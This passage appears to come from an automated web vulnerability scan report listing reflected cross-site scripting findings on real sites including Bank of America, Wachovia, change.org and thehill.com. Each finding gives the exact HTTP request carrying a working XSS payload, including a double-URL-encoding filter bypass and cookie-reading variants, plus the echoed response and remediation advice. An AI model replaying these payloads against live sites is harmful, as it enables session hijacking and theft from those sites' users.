The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:12 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan">
...[SNIP]...

3.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.change.org
Path:   /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "b50aa88426653a094f386591a7682307"
X-Runtime: 771
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: change_session_id=c5b8d93b80d9ed64f7c66ce96c5d235f; domain=.change.org; path=/; HttpOnly
Content-Length: 22463
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7]> <html class="no-js ie6" lang="en-US" xml:lang="en-US" xmlns=
...[SNIP]...
st","RAILS_ENV":"production","action":"show","page_name":"news-show-27728","controller":"stories"};
_gaq = [["_trackPageview","/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1"]];
//]]>
...[SNIP]...

3.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/
Date: Wed, 02 Feb 2011 21:59:59 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
                           v
...[SNIP]...

3.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33648
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/
Date: Wed, 02 Feb 2011 21:59:54 GMT
Connection: close


   <script type="text/javascript">
       alert ("Special Characters are not allowed.");
       location.href = "http://www.bankofamerica.com";
   </script>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1">
...[SNIP]...

3.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/
Date: Wed, 02 Feb 2011 21:59:58 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
   
if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else

...[SNIP]...

3.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 22:02:36 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="9c128"><script>alert(1)</script>0f891e45ab3" style="display:none;visibility:hide">
...[SNIP]...

3.61. http://search.wareseeker.com/ip-board/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
<a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware">
...[SNIP]...

3.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
<a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/">
...[SNIP]...

3.63. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/WareSeekercom/ROS/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Thu, 03 Feb 2011 01:33:43 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Thu, 03 Feb 2011 02:33:43 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11790

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "wareseekercoma25e7<a>ea4068e9f94";
t.adSpace = "ros";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

3.64. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/WareSeekercom/ROS/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Thu, 03 Feb 2011 01:34:05 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Thu, 03 Feb 2011 02:34:05 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11790

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "wareseekercom";
t.adSpace = "ros66ae8<a>a5a81e35302";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

3.65. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/
Connection: close
Content-Length: 73997

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'>
...[SNIP]...

3.66. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 02:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 02:15:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/
Connection: close
Content-Length: 76050

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'>
...[SNIP]...

3.67. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/
Connection: close
Content-Length: 74000

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'>
...[SNIP]...

3.68. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /desktop-weather/web-widgets/getSticker.html

Issue detail

The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /desktop-weather/web-widgets/getSticker.html?CityCode=800326&ZCode=z554582c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a&Size=250x250&StationID=VMMC&units=1&Version=2 HTTP/1.1
Host: weather.weatherbug.com
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1465904929-1294800439843; s_vi=[CS]v1|26968B0D051593FE-600001A2C00484CA[CE]; OAX=rcHW800tFhsAALQo; RMAM=01TFSM_.4fI8bZDG|TFSM_1700.4fKIQL6G|; wxbug_cookie1=camera_id=&dma=&lang_id=en-US&zip=&city=50064&postal_code=&stat=SABE&city_name=Buenos Aires&state_code=&state_name=&country=AR&country_name=Argentina&region=10&region_name=South America&units=0&has_cookies=1; RMFD=011PdrDqO101FnC|O101FnE|O101GDp; wxbug_cookie2=&country_name0=Argentina&state_code0=&city_name0=Buenos Aires&zip0=&stat0=SABE&country_name1=USA&state_code1=&city_name1=&zip1=&stat1=SABE&country_name2=&state_code2=&city_name2=&zip2=&stat2=&country_name3=&state_code3=&city_name3=&zip3=&stat3=&country_name4=&state_code4=&city_name4=&zip4=&stat4=; __utma_a2a=6534489744.1326357366.1294800440.1295040624.1295040629.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
p3p: CP="NON DSP COR NID"
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 01:33:32 GMT
Connection: close
Content-Length: 2116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>WeatherBug&r
...[SNIP]...
<a href="http://weather.weatherbug.com/Macau/Macao-weather.html?zcode=z554582c7f"style="x:expression(alert(1))"3660fe20f2a&units=1&stat=VMMC" target='_blank'>
...[SNIP]...

3.69. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /desktop-weather/web-widgets/getSticker.html

Issue detail

The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /desktop-weather/web-widgets/getSticker.html?CityCode=800326&ZCode=z5545cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d&Size=250x250&StationID=VMMC&units=1&Version=2 HTTP/1.1
Host: weather.weatherbug.com
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
